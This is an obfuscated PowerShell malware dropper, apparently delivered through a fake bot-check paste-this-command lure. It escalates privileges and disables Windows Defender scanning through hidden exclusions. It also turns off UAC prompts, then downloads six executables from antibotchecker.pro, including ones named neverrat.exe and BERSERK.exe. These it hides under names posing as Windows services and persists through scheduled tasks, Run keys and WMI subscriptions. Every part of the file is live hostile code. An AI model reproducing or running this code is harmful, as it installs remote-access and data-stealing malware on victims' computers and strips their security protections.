Set-StrictMode -Off $ErrorActionPreference = 'SilentlyContinue' $WarningPreference = 'SilentlyContinue' $VerbosePreference = 'SilentlyContinue' $DebugPreference = 'SilentlyContinue' $InformationPreference = 'SilentlyContinue' $ProgressPreference = 'SilentlyContinue' $ConfirmPreference = 'None' trap { continue } $debugLog = $false $logPath = Join-Path $env:TEMP 'wus.log' function Write-Log([string]$Text) { if (-not $debugLog) { return } try { Add-Content -LiteralPath $logPath -Value (('[' + (Get-Date -Format 'HH:mm:ss') + '] ' + $Text)) -Encoding UTF8 } catch {} } $mpExcl = @() try { foreach ($e0 in @((& ('Get-Mp'+'Preference')).ExclusionPath)) { if ($e0) { $mpExcl += ([string]$e0).TrimEnd('\').ToLower() } } } catch { } function Add-ExclPath([string]$Path, [string]$RegKey) { if (-not $Path) { return } $n0 = ([string]$Path).TrimEnd('\').ToLower() foreach ($e0 in @($script:mpExcl)) { if ($e0 -eq $n0) { return } } try { sp -Path $RegKey -Name $Path -Value 0 -Type DWord -Force -ErrorAction 0 } catch {} try { $h = @{}; $h[('Excl'+'usionPath')] = $Path; & ('Add-Mp'+'Preference') @h -Force -ErrorAction 0 } catch {} $script:mpExcl += $n0 } $sc = $null try { $sc = (gv ('MyInvo'+'cation')).Value.MyCommand.ScriptBlock.ToString() } catch {} if (-not $sc) { $sp0 = (gv ('MyInvo'+'cation')).Value.MyCommand.Path if ($sp0) { try { $sc = (gc -LiteralPath $sp0 -Raw) } catch {} } } $adm = $false try { $id0 = [Security.Principal.WindowsIdentity]::GetCurrent() $pr0 = New-Object Security.Principal.WindowsPrincipal($id0) if ($pr0.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { $adm = $true } } catch { } if (-not $adm) { try { net session 2>$null | Out-Null; if ($?) { $adm = $true } } catch { } } try { if (-not $adm) { if ($env:__hv -eq '1') { exit } $env:__hv = '1' $bt = ($env:TEMP + '\el' + 'evated.ps1') if ($sc) { try { Set-Content -LiteralPath $bt -Value $sc -En ASCII -ErrorAction SilentlyContinue } catch {} } try { Start-Process ('powe'+'rshell') ('-NoP -Ex By' + 'pass -Wi Hid' + 'den -File "' + $bt + '"') -Verb RunAs -ErrorAction SilentlyContinue } catch {} exit } } catch { exit } if ($env:__hv -eq '1') { try { Remove-Item -LiteralPath ($env:TEMP + '\el' + 'evated.ps1') -Force -ErrorAction SilentlyContinue } catch {} } try { $pd = ('%AppData%\Micro'+'soft\Windows\The'+'mes') $df = Join-Path $env:APPDATA ('Micro'+'soft\Windows\The'+'mes') if (-not (Test-Path $df)) { New-Item -Path $df -ItemType Directory -Force | Out-Null } if (-not (Test-Path $df)) { throw 'no dir' } } catch { $pd = $null; $df = $null } if (-not $df) { exit } $binaries = @( ('Windows'+'UpdateService.exe'), ('System'+'Maintenance.exe'), ('Network'+'Service.exe'), ('Device'+'Sync.exe'), ('Background'+'Tasks.exe'), ('Telemetry'+'Service.exe'), ('Diagnostics'+'Hub.exe'), ('Security'+'Health.exe'), ('AppX'+'Deployment.exe'), ('Font'+'Cache.exe'), ('WaaS'+'Medic.exe'), ('Windows'+'Search.exe') ) $folders = @( ('System'+'Resources'), ('Language'+'Overlays'), ('Access'+'ibility'), 'InputMethod', 'Cursors', 'Themes', 'Icons', 'Wallpapers', 'LogonUI', 'WinSetup' ) $legit = @('WindowsUpdate','MicrosoftEdgeUpdate','OneDriveSync','AdobeUpdate','GoogleUpdate','WindowsDefender','SystemMaintenance','NetworkService','DeviceSync','BackgroundTasks','TelemetryService','DiagnosticsHub','SecurityHealth','AppXDeployment','FontCache','WaaSMedic','WindowsSearch','PrintSpooler','BluetoothService','StorageService','DisplayService','InputService') function Get-StableHash([string]$Text) { $h = [int64]17 foreach ($c in $Text.ToCharArray()) { $h = (($h * 131) + [int64][int]$c) % 2147483647 } return [int64]$h } function Get-DetNum($seed) { $v = Get-StableHash ([string]$env:COMPUTERNAME + '|' + [string]$seed) return (($v % 9000) + 1000) } $usedPaths = @{} function Get-Slot([int]$seed) { for ($k = 0; $k -lt ($binaries.Count * $folders.Count); $k++) { $bi = ($seed + $k) % $binaries.Count $fi = (($seed * 7) + $k) % $folders.Count $cand = Join-Path $df ($folders[$fi] + '\' + $binaries[$bi]) if (-not $usedPaths.ContainsKey($cand)) { $usedPaths[$cand] = $true; return @($bi, $fi) } } $bi = Get-Random -Maximum $binaries.Count $fi = Get-Random -Maximum $folders.Count return @($bi, $fi) } function Test-FileOk([string]$Path) { try { if (-not (Test-Path -LiteralPath $Path)) { return $false } if ((Get-Item -LiteralPath $Path -Force).Length -le 0) { return $false } return $true } catch { return $false } } function Clear-Clip { try { Add-Type -AssemblyName System.Windows.Forms -ErrorAction SilentlyContinue } catch {} try { [System.Windows.Forms.Clipboard]::Clear() } catch {} try { Set-Clipboard -Value ' ' -ErrorAction SilentlyContinue } catch {} try { [System.Windows.Forms.Clipboard]::Clear() } catch {} } $urls = @( @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'SUP.exe'); Auto = $true }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'MR.exe'); Auto = $true }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'neverrat.exe'); Auto = $true }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'host.exe'); Auto = $false }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'BERSERK.exe'); Auto = $true }, @{ Address = ('https:/'+'/antibotchecker'+'.pro/'+'cl2.exe'); Auto = $true } ) $jobs = @() foreach ($item in $urls) { if ($item.Address -and $item.Address.Trim()) { $jobs += @{ Uri = $item.Address.Trim().Replace('"',''); Permanent = [bool]$item.Auto } } } $wmiNs = ('root\sub'+'scription') try { Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object { $t0 = $_ try { $hit = $false foreach ($a0 in $t0.Actions) { $ar = [string]$a0.Arguments if (($ar -match ('Down'+'loadFile')) -or ($ar -match ('App'+'Data\\Local\\Temp'))) { $hit = $true } if (($ar -match ('-E'+'nc ')) -or ($ar -match ('JAB1AD0A'))) { $hit = $true } if (($ar -match '\\([^\\]+\.(exe|ps1))') -and (-not (Test-Path -LiteralPath $matches[1]))) { $hit = $true } if ($ar -match ('Font'+'Cache\d+\.ps1') -and ($ar -notmatch ('The'+'mes\\Font'+'Cache'))) { $hit = $true } } if ($hit) { Unregister-ScheduledTask -TaskName $t0.TaskName -TaskPath $t0.TaskPath -Confirm:$false -ErrorAction SilentlyContinue } } catch { } } } catch { } foreach ($pair in @(@('__Event'+'Filter', 'SelfHeal'), @('__Event'+'Filter', 'PerfNet'), @('CommandLine'+'Event'+'Consumer', 'SelfHealC'), @('CommandLine'+'Event'+'Consumer', 'PerfProc'))) { try { Get-WmiObject -Namespace $wmiNs -Class $pair[0] -ErrorAction SilentlyContinue | Where-Object { $_.Name -like ($pair[1] + '*') } | Remove-WmiObject -ErrorAction SilentlyContinue } catch { } } try { $rk = ('HKCU:\Soft'+'ware\Microsoft\Windows\Cur'+'rentVersion\Run') $rp1 = Get-ItemProperty -Path $rk -ErrorAction SilentlyContinue foreach ($pr1 in @($rp1.PSObject.Properties)) { if ($pr1.Name -match '^PS') { continue } $dv = [string]$pr1.Value if (($dv -match ('-E'+'nc ')) -or ($dv -match ('Down'+'loadFile')) -or ($dv -match ('JAB1AD0A'))) { try { Remove-ItemProperty -Path $rk -Name $pr1.Name -Force -ErrorAction SilentlyContinue } catch { } } } } catch { } $mtxName = 'Global\WaaSMedic_Ctl' $created = $false $mtx = $null try { $mtx = New-Object System.Threading.Mutex($true, $mtxName, [ref]$created) } catch { $mtx = $null } if ($mtx -and (-not $created)) { Write-Log 'already running' try { $mtx.Dispose() } catch {} exit } try { foreach ($k in @(('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Po'+'licy'),('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Pro'+'tected'))) { try { if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null } } catch {} } try { sp -Path ('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Po'+'licy') -Name ('VerifiedAnd'+'Reputable'+'PolicyState') -Value 0 -Type DWord -Force -ErrorAction 0 } catch {} try { sp -Path ('HKLM:\SYSTEM\Cur'+'rentCon'+'trolSet\Control\CI\Pro'+'tected') -Name ('VerifiedAnd'+'Reputable'+'PolicyState'+'Min'+'ValueSeen') -Value 0 -Type DWord -Force -ErrorAction 0 } catch {} $dp = ('HKLM:\SOFT'+'WARE\Policies\Microsoft\Windows Def'+'ender') try { if (-not (Test-Path $dp)) { New-Item -Path $dp -Force | Out-Null } } catch {} try { sp -Path $dp -Name ('Hide'+'Exclu'+'sionsUI') -Value 1 -Type DWord -Force -ErrorAction 0 } catch {} try { sp -Path $dp -Name ('Hide'+'Exclu'+'sions'+'FromLocal'+'Admins') -Value 1 -Type DWord -Force -ErrorAction 0 } catch {} try { sp -Path $dp -Name ('Hide'+'Exclu'+'sions'+'FromLocal'+'Users') -Value 1 -Type DWord -Force -ErrorAction 0 } catch {} try { sp -Path $dp -Name ('Disable'+'Special'+'Detection') -Value 1 -Type DWord -Force -ErrorAction 0 } catch {} $xp = ($dp + '\Exclusions\Paths') $xe = ($dp + '\Exclusions\Extensions') foreach ($k in @($xp,$xe)) { try { if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null } } catch {} } try { $pv = Get-ItemProperty -Path $xp -ErrorAction SilentlyContinue foreach ($pr0 in @($pv.PSObject.Properties)) { if ($pr0.Name -match '^PS') { continue } $script:mpExcl += ([string]$pr0.Name).TrimEnd('\').ToLower() } } catch { } $adRoot = $null try { $adRoot = (Split-Path -LiteralPath $env:APPDATA -Parent) } catch { } if (-not $adRoot) { try { $adRoot = ($env:USERPROFILE + '\App'+'Data') } catch { } } foreach ($p in @($adRoot, $env:TEMP, $env:APPDATA, $df)) { if (-not $p) { continue } Add-ExclPath -Path $p -RegKey $xp } foreach ($e in @(".exe", ".ps1")) { try { sp -Path $xe -Name $e -Value 0 -Type DWord -Force -ErrorAction 0 } catch {} try { $h = @{}; $h[('Excl'+'usion'+'Extension')] = $e; & ('Add-Mp'+'Preference') @h -Force -ErrorAction 0 } catch {} } $rp = ('HKLM:\SOFT'+'WARE\Microsoft\Windows\Cur'+'rentVersion\Policies\Sys'+'tem') $uc = @{ ('Consent'+'Prompt'+'Behavior'+'Admin') = 0 ('Consent'+'Prompt'+'Behavior'+'User') = 0 ('PromptOn'+'Secure'+'Desktop') = 0 ('Enable'+'Installer'+'Detection') = 0 'EnableLUA' = 1 } foreach ($entry in $uc.Keys) { try { sp -Path $rp -Name $entry -Value $uc[$entry] -Type DWord -Force -ErrorAction 0 } catch {} } try { $tn = ('System.Net.Serv'+'icePoint'+'Manager') [Net.WebClient].Assembly.GetType($tn).GetMethod(('set_Secur'+'ityProtocol')).Invoke($null, @([Int32]3072)) } catch {} } catch { } try { Start-Sleep -Seconds 4 } catch {} function Download-File { param([string]$Uri, [string]$Out, [int]$Tries = 5) for ($i = 0; $i -lt $Tries; $i++) { try { $wc = New-Object Net.WebClient $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') $wc.DownloadFile($Uri, $Out) } catch { Write-Log ('wc fail ' + $Uri) } if (-not (Test-FileOk $Out)) { try { Invoke-WebRequest -Uri $Uri -OutFile $Out -UseBasicParsing -TimeoutSec 60 -ErrorAction Stop } catch { Write-Log ('iwr fail ' + $Uri) } } if (-not (Test-FileOk $Out)) { try { $hc = New-Object Net.Http.HttpClient $hc.Timeout = [TimeSpan]::FromSeconds(60) $bytes = $hc.GetByteArrayAsync($Uri).GetAwaiter().GetResult() [IO.File]::WriteAllBytes($Out, $bytes) } catch { Write-Log ('http fail ' + $Uri) } } if (Test-FileOk $Out) { return $true } try { Start-Sleep -Milliseconds (Get-Random -Minimum 1000 -Maximum 3000) } catch {} } return $false } function Invoke-Exe { param([string]$Path) if (-not (Test-FileOk $Path)) { Write-Log ('missing ' + $Path); return $false } $proc = $null try { $proc = Start-Process -FilePath $Path -WindowStyle Hidden -PassThru -ErrorAction SilentlyContinue } catch { Write-Log ('sp fail ' + $Path) } if ($proc) { return $true } try { $r = ([wmiclass]('root\cimv2:' + 'Win32_'+'Pro'+'cess')).Create('"' + $Path + '"', (Split-Path -LiteralPath $Path -Parent)) if ($r -and $r.ReturnValue -eq 0) { return $true } Write-Log ('wmi rc ' + $r.ReturnValue + ' ' + $Path) } catch { Write-Log ('wmi fail ' + $Path) } return $false } Clear-Clip foreach ($task in @($jobs)) { try { $n1 = Get-DetNum $task.Uri $slot = Get-Slot $n1 $bi = $slot[0] $fi = $slot[1] $td = Join-Path $df $folders[$fi] if (-not (Test-Path $td)) { New-Item -Path $td -ItemType Directory -Force | Out-Null } $tf = Join-Path $td $binaries[$bi] $null = Download-File -Uri $task.Uri -Out $tf if (-not (Test-FileOk $tf)) { Write-Log ('skip ' + $tf); continue } try { attrib +h +s $tf 2>$null | Out-Null } catch { } if ($task.Permanent) { $tname = ($legit[$n1 % $legit.Count]) + $n1 $act = New-ScheduledTaskAction -Execute $tf $tB2 = New-ScheduledTaskTrigger -AtStartup try { $tB2.Delay = (New-TimeSpan -Seconds 45) } catch { } $tL2 = New-ScheduledTaskTrigger -AtLogOn try { $tL2.Delay = (New-TimeSpan -Seconds 20) } catch { } $trg = @($tB2, $tL2) $stt = New-ScheduledTaskSettingsSet -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -RestartCount 3 -RestartInterval (New-TimeSpan -Minutes 1) -MultipleInstances IgnoreNew try { $stt.ExecutionTimeLimit = [TimeSpan]::Zero } catch { } $stt.Hidden = $true try { Unregister-ScheduledTask -TaskName $tname -Confirm:$false -ErrorAction SilentlyContinue } catch { } try { $prn = New-ScheduledTaskPrincipal -UserId ($env:USERDOMAIN + '\' + $env:USERNAME) -LogonType Interactive -RunLevel Highest Register-ScheduledTask -TaskName $tname -Action $act -Trigger $trg -Settings $stt -Principal $prn -Force -ErrorAction Stop | Out-Null } catch { try { Register-ScheduledTask -TaskName $tname -Action $act -Trigger $trg -Settings $stt -Force | Out-Null } catch { } } try { sp -Path ('HKCU:\Soft'+'ware\Microsoft\Windows\Cur'+'rentVersion\Run') -Name $tname -Value ('"' + $tf + '"') -Force -ErrorAction 0 } catch { } } $wmiF = ('PerfNet' + $n1) $wmiC = ('PerfProc' + $n1) $wql = "SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA '" + ('Win32_'+'Pro'+'cess') + "' AND TargetInstance.Name = '" + ('explorer'+'.exe') + "'" try { Get-WmiObject -Namespace $wmiNs -Class ('__Event'+'Filter') -Filter "Name='$wmiF'" -ErrorAction SilentlyContinue | Remove-WmiObject -ErrorAction SilentlyContinue Get-WmiObject -Namespace $wmiNs -Class ('CommandLine'+'Event'+'Consumer') -Filter "Name='$wmiC'" -ErrorAction SilentlyContinue | Remove-WmiObject -ErrorAction SilentlyContinue $f = Set-WmiInstance -Namespace $wmiNs -Class ('__Event'+'Filter') -Arguments @{ Name = $wmiF; EventNamespace = 'root\cimv2'; QueryLanguage = 'WQL'; Query = $wql } $c = Set-WmiInstance -Namespace $wmiNs -Class ('CommandLine'+'Event'+'Consumer') -Arguments @{ Name = $wmiC; CommandLineTemplate = ('"' + $tf + '"') } Set-WmiInstance -Namespace $wmiNs -Class ('__FilterTo'+'Consumer'+'Binding') -Arguments @{ Filter = $f; Consumer = $c } } catch { } $null = Invoke-Exe -Path $tf } catch { Write-Log ('loop ' + $_.Exception.Message) } }